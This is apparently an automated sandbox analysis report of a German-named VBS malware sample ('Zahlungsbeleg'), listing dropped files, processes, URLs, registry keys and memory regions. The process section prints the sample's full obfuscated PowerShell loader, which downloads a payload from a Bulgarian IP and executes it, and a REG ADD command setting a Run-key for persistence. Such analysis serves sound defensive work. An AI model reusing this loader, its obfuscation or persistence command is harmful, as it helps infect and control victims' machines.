Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Zahlungsbeleg 202405029058.vbs
|
ASCII text, with very long lines (544), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_kOAlByYcnQDKnTpl_327026411039ada1632c02759e63f9f9a873f8f_65f2932f_f5595536-7500-416e-9633-5d6e840a3c88\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E0F.tmp.dmp
|
Mini DuMP crash report, 14 streams, Sat May 4 07:52:55 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F87.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7583.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13umbca1.mvr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gehvpr2m.eg1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_viun0yu2.5ef.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wykkg2hr.oea.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Vaterpassenes24.Acc
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping google.com -n 1
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping %.%.%.%
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c dir
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function
Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke(
$Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende
'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin
Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente
TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1
Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende
'.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe.
jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret
t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne
(Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey
S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi
NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth
ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene
VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee
SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot
Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m=
I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg
rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad
Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu
Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cvar.ee
SaagrN ninsC.ook= SurfNLkkereTribuwSk am-Tire OUnprobEidesjBitumeStyrmckor otSurm. HjagtSBle.iy SupesUnsu.tTilkeeMak rmPlta..
LmmeNTela,e UnvetPrvel. VegeWmeniseKiwieb ReupC AntilUnsa.iSpe ieVint nTeglvta alo ');biblioteksfilerne (Tyknende '.nfan$
DeusFFam,lr TiggeThodueIndsalLeakia Helln.ortvc udvaeH nstrVolumsMe.le.,ekonHO.stdeRedera VinedDiftoeBasrerSeculsGaast[Gidse$BaadsPRadiorAp.thi.ublem
Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende
' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntegeForvar bekms Gr,p.Adju D no coInsu.wEtabln B.valAn icoOrenjaStj.rdBegreFGrundiP,efalU,vuleKrigs(
Hydr$ba,reDFoldaiTorpeeGauffnRefle,Robin$GematoMalesvExtrae omarstramdVagtmrMatt,ythion)Hagta ';$Naturtr=$Titar[1]+$Naturtr;$overdry=$Titar[0];biblioteksfilerne
(Tyknende 'Respi$Unling ,haklSanitoImmunbKoereaCortel Wise:.hmsmESta.ls TanztAd.omhF imreSommesGiganiDkfaboBitism,chelemi,rot
Fr,srHomelyPos e1Unruf7Ne,to6 Anti=Alter(UncliTF,agmeBordesTzaritMarse-CoccoPPolyea Catat BesthAfliv Arbej$FestioMyriavIsraeeWal,arPaatrdCountr
roreyPaasy)Sivap ');while (!$Esthesiometry176) {biblioteksfilerne (Tyknende 'S vsk$,nequgSkindlDummeoSyst bMote.aStereladmir:Maro
L MaraeStrghvProp ePhot.mHoneya DryanB,rkndNeg.rsOve v= s.id$C asstUn eurPreinu SkraeI,gtt ') ;biblioteksfilerne $Naturtr;biblioteksfilerne
(Tyknende 'FradrS,rakvtDentnaAbdicrRec mt,dult-BashfSSaltblSaddeeRukaneTen.epHerop Srgem4Bakov ');biblioteksfilerne (Tyknende
'pulve$Extrag TolllRubasoEsotebUenigaafgrel.alad: HvsnEPustesB,mbltSidsthEspoueServisunnaki FdevoGuldsmExpuneTravet EmnerSov
kyPo.tl1De.el7 Co r6Ha ay= O.pl(I,venT Svi,eForplsFds etVinte-Ke,tsPper,daPerittRhodehSjatt Firaa$ForsyoUnhusvRe,ece Ant,rH.mogdDese
r Wo,syInter)A,fri ') ;biblioteksfilerne (Tyknende 'Reg,s$Kemikg Duv.lHeno,oUnideb Ho.kaMa telNonev: popSAp oceBrassp DiaktbarkeiBeskrs.rnseyClinil
SkatlHyperaCharmb ChrolDy.ehesi if=Strej$ cla,gDemesl D buoBedlabNarkoaBardulViles:Arb.jC Lagra F.agtU.hunt.enselRingleChan.gSvrdla,aveetC,cobeTelen1Aden
+Penan+Nause%Ridde$Vak.eFOkariaSt ute OverrFestsdRetspiMiljagSpads. Therc Fi eoPerjuuStikknFrem.tEnsn ') ;$Dien=$Faerdig[$Septisyllable];}biblioteksfilerne
(Tyknende 'Multi$UnsuigMicrolStumpoL icibRevleaBogydlCont :PotomFned.roBedu,s PowesBat hePre,crKybel gasbl= Trai estheGAnimee
eizit kemi- NonjCB,ldioRet hnGaasetara,ieRrelsnTjlestExcub Sator$KonduoLitt.vBepapeH,emmrIntemdSeniarAfkray Male ');biblioteksfilerne
(Tyknende 'Nonde$ByretgBrugslEvacuoTjenebDadelaOpk elUdsen: A chP For.otranssT rteiDkstitLovgiiUds ro ,rilnSlidssFri,tao,erdnG,dfrgJaskei
AcnevInconebyltelMattbsR,vene esmo .aret=,orsk Acaro[VestaS Un.ryHe.tasSa met.renieEvalum,ontr. .echCHarbro Mun nAsc.ivTopngeBolsjr
Ko mtEpico]React:Mange: DecaFGamogr Ud.eomik om ermiBd.sseaTornesSpendeSe.su6 Jock4nonniSSny etTreetrMerc iProren nfeagPlica(Surpl$tidehFCodoro
ellsHvirvsFlutee De,irUndow)Count ');biblioteksfilerne (Tyknende 'Synsp$Siccig Ca dlTa,sto.rolebNogleaRenholStagn:B rfoDNordbeScrimlKro.seTropog
KisteSilverBoghve Afbrt Sel mRembudB.dgeeunglor Puka ,rvle=Moder Marqu[to,roSPartiy KaolsSnibbtNonioe ,nibmUnbef.Af lrTGgegeeHushaxBord,tNonv,.
ubsaESforzn Illuc posio SkuldCo upiYppetnSabbigNorde]Norda:,unkt:CustoA yveSEfterCFortsIS entIAnusi.Ska,tGPeccaeVeiletTovtrSTin
ltBrummr DialiN,nrenslvfegSten,(Vrdia$ V deP T,rooAcyansOateriTramwt PoleiSixpeoBevirn FestsA.eolaUndebnNonprg plebiCog.ov,rovie
S.mil.oglesMentaeHello)Ratif ');biblioteksfilerne (Tyknende 'Junni$ForhagGieselJoyproMedlbb Ultia Umynl emin:AaremBFernaiVernansljferty,edePneums
sinu=Knogl$ForpaDSphegeTra ilvers.eVrikdgNord,e Frosr OdoneZombitS,rtemStipud trope Rejnr ,eli.AriadsTypoguV.ntubCephasResidt
yprer ProfiNonnenHoe.lgKonfe(Ceilo2Bgesp8Advi 4 Anra0Contr2 Uove1Admin, S dd2 Opsl8Drfta4 B,ho7 Medi1Biolu)Novit ');biblioteksfilerne
$Binres;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function
Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke(
$Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende
'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin
Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente
TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1
Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende
'.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe.
jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret
t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne
(Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey
S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi
NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth
ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene
VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee
SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot
Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m=
I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg
rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad
Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu
Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cvar.ee
SaagrN ninsC.ook= SurfNLkkereTribuwSk am-Tire OUnprobEidesjBitumeStyrmckor otSurm. HjagtSBle.iy SupesUnsu.tTilkeeMak rmPlta..
LmmeNTela,e UnvetPrvel. VegeWmeniseKiwieb ReupC AntilUnsa.iSpe ieVint nTeglvta alo ');biblioteksfilerne (Tyknende '.nfan$
DeusFFam,lr TiggeThodueIndsalLeakia Helln.ortvc udvaeH nstrVolumsMe.le.,ekonHO.stdeRedera VinedDiftoeBasrerSeculsGaast[Gidse$BaadsPRadiorAp.thi.ublem
Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende
' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntegeForvar bekms Gr,p.Adju D no coInsu.wEtabln B.valAn icoOrenjaStj.rdBegreFGrundiP,efalU,vuleKrigs(
Hydr$ba,reDFoldaiTorpeeGauffnRefle,Robin$GematoMalesvExtrae omarstramdVagtmrMatt,ythion)Hagta ';$Naturtr=$Titar[1]+$Naturtr;$overdry=$Titar[0];biblioteksfilerne
(Tyknende 'Respi$Unling ,haklSanitoImmunbKoereaCortel Wise:.hmsmESta.ls TanztAd.omhF imreSommesGiganiDkfaboBitism,chelemi,rot
Fr,srHomelyPos e1Unruf7Ne,to6 Anti=Alter(UncliTF,agmeBordesTzaritMarse-CoccoPPolyea Catat BesthAfliv Arbej$FestioMyriavIsraeeWal,arPaatrdCountr
roreyPaasy)Sivap ');while (!$Esthesiometry176) {biblioteksfilerne (Tyknende 'S vsk$,nequgSkindlDummeoSyst bMote.aStereladmir:Maro
L MaraeStrghvProp ePhot.mHoneya DryanB,rkndNeg.rsOve v= s.id$C asstUn eurPreinu SkraeI,gtt ') ;biblioteksfilerne $Naturtr;biblioteksfilerne
(Tyknende 'FradrS,rakvtDentnaAbdicrRec mt,dult-BashfSSaltblSaddeeRukaneTen.epHerop Srgem4Bakov ');biblioteksfilerne (Tyknende
'pulve$Extrag TolllRubasoEsotebUenigaafgrel.alad: HvsnEPustesB,mbltSidsthEspoueServisunnaki FdevoGuldsmExpuneTravet EmnerSov
kyPo.tl1De.el7 Co r6Ha ay= O.pl(I,venT Svi,eForplsFds etVinte-Ke,tsPper,daPerittRhodehSjatt Firaa$ForsyoUnhusvRe,ece Ant,rH.mogdDese
r Wo,syInter)A,fri ') ;biblioteksfilerne (Tyknende 'Reg,s$Kemikg Duv.lHeno,oUnideb Ho.kaMa telNonev: popSAp oceBrassp DiaktbarkeiBeskrs.rnseyClinil
SkatlHyperaCharmb ChrolDy.ehesi if=Strej$ cla,gDemesl D buoBedlabNarkoaBardulViles:Arb.jC Lagra F.agtU.hunt.enselRingleChan.gSvrdla,aveetC,cobeTelen1Aden
+Penan+Nause%Ridde$Vak.eFOkariaSt ute OverrFestsdRetspiMiljagSpads. Therc Fi eoPerjuuStikknFrem.tEnsn ') ;$Dien=$Faerdig[$Septisyllable];}biblioteksfilerne
(Tyknende 'Multi$UnsuigMicrolStumpoL icibRevleaBogydlCont :PotomFned.roBedu,s PowesBat hePre,crKybel gasbl= Trai estheGAnimee
eizit kemi- NonjCB,ldioRet hnGaasetara,ieRrelsnTjlestExcub Sator$KonduoLitt.vBepapeH,emmrIntemdSeniarAfkray Male ');biblioteksfilerne
(Tyknende 'Nonde$ByretgBrugslEvacuoTjenebDadelaOpk elUdsen: A chP For.otranssT rteiDkstitLovgiiUds ro ,rilnSlidssFri,tao,erdnG,dfrgJaskei
AcnevInconebyltelMattbsR,vene esmo .aret=,orsk Acaro[VestaS Un.ryHe.tasSa met.renieEvalum,ontr. .echCHarbro Mun nAsc.ivTopngeBolsjr
Ko mtEpico]React:Mange: DecaFGamogr Ud.eomik om ermiBd.sseaTornesSpendeSe.su6 Jock4nonniSSny etTreetrMerc iProren nfeagPlica(Surpl$tidehFCodoro
ellsHvirvsFlutee De,irUndow)Count ');biblioteksfilerne (Tyknende 'Synsp$Siccig Ca dlTa,sto.rolebNogleaRenholStagn:B rfoDNordbeScrimlKro.seTropog
KisteSilverBoghve Afbrt Sel mRembudB.dgeeunglor Puka ,rvle=Moder Marqu[to,roSPartiy KaolsSnibbtNonioe ,nibmUnbef.Af lrTGgegeeHushaxBord,tNonv,.
ubsaESforzn Illuc posio SkuldCo upiYppetnSabbigNorde]Norda:,unkt:CustoA yveSEfterCFortsIS entIAnusi.Ska,tGPeccaeVeiletTovtrSTin
ltBrummr DialiN,nrenslvfegSten,(Vrdia$ V deP T,rooAcyansOateriTramwt PoleiSixpeoBevirn FestsA.eolaUndebnNonprg plebiCog.ov,rovie
S.mil.oglesMentaeHello)Ratif ');biblioteksfilerne (Tyknende 'Junni$ForhagGieselJoyproMedlbb Ultia Umynl emin:AaremBFernaiVernansljferty,edePneums
sinu=Knogl$ForpaDSphegeTra ilvers.eVrikdgNord,e Frosr OdoneZombitS,rtemStipud trope Rejnr ,eli.AriadsTypoguV.ntubCephasResidt
yprer ProfiNonnenHoe.lgKonfe(Ceilo2Bgesp8Advi 4 Anra0Contr2 Uove1Admin, S dd2 Opsl8Drfta4 B,ho7 Medi1Biolu)Novit ');biblioteksfilerne
$Binres;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189%
($Yodellers23)"
|
|
|
|
C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe
|
"C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe"
|
|
|
|
C:\Windows\SysWOW64\clip.exe
|
"C:\Windows\SysWOW64\clip.exe"
|
|
|
|
C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe
|
"C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w
1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480
|
There are 10 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://87.121.105.54/Oxaluria209.smiP
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://87.121.105.54
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://87.121.105.54/Oxaluria209.smi
|
87.121.105.54
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.54/vKdsOriqv105.bin
|
87.121.105.54
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://87.121.H
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 6 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
google.com
|
142.250.72.174
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.72.174
|
google.com
|
United States
|
||
|
87.121.105.54
|
unknown
|
Bulgaria
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Lrlingekontrakten
|
Propertyless
|
||
|
HKEY_CURRENT_USER\Environment
|
Tidsperioderne189
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5936000
|
trusted library allocation
|
page read and write
|
|
|
|
8710000
|
direct allocation
|
page execute and read and write
|
|
|
|
4F10000
|
remote allocation
|
page execute and read and write
|
|
|
|
EC0000
|
trusted library allocation
|
page read and write
|
|
|
|
3B80000
|
unkown
|
page execute and read and write
|
|
|
|
C70000
|
system
|
page execute and read and write
|
|
|
|
25250000
|
unclassified section
|
page execute and read and write
|
|
|
|
9C0000
|
system
|
page execute and read and write
|
|
|
|
10E0000
|
system
|
page execute and read and write
|
|
|
|
1A99C1F3000
|
trusted library allocation
|
page read and write
|
|
|
|
AFC0000
|
direct allocation
|
page execute and read and write
|
|
|
|
E80000
|
trusted library allocation
|
page read and write
|
|
|
|
271C2034000
|
heap
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
316E000
|
heap
|
page read and write
|
||
|
81EE000
|
stack
|
page read and write
|
||
|
1A98E35E000
|
trusted library allocation
|
page read and write
|
||
|
7390000
|
heap
|
page read and write
|
||
|
1A9A46F0000
|
heap
|
page execute and read and write
|
||
|
1A98C6D9000
|
trusted library allocation
|
page read and write
|
||
|
271C20FD000
|
heap
|
page read and write
|
||
|
4B1000
|
unkown
|
page execute read
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
7E30000
|
direct allocation
|
page read and write
|
||
|
BF0000
|
unkown
|
page read and write
|
||
|
A00000
|
unkown
|
page read and write
|
||
|
1A9A45E0000
|
heap
|
page read and write
|
||
|
2A3F000
|
stack
|
page read and write
|
||
|
